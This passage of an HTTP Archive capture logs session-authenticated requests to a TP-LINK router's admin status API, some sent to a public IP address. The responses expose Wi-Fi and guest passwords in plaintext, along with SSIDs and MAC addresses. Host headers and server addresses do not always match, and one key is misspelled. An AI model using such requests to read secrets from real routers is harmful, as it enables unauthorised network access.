ds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.07,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 282,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 681,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:09:59.659+03:00\",\r\n \"time\": 1832,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 275,\r\n \"dns\": 250,\r\n \"connect\": 526,\r\n \"send\": 0,\r\n \"wait\": 773,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:09.643+03:00\",\r\n \"time\": 978,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.08,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guet_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 268,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 674,\r\n \"receive\": 36\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:09.647+03:00\",\r\n \"time\": 1794,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://187.60.220.34:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"187.60.220.34:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 265,\r\n \"dns\": 251,\r\n \"connect\": 520,\r\n \"send\": 0,\r\n \"wait\": 754,\r\n \"receive\": 4\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:19.647+03:00\",\r\n \"time\": 994,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://187.60.220.34:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"187.60.220.34:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"w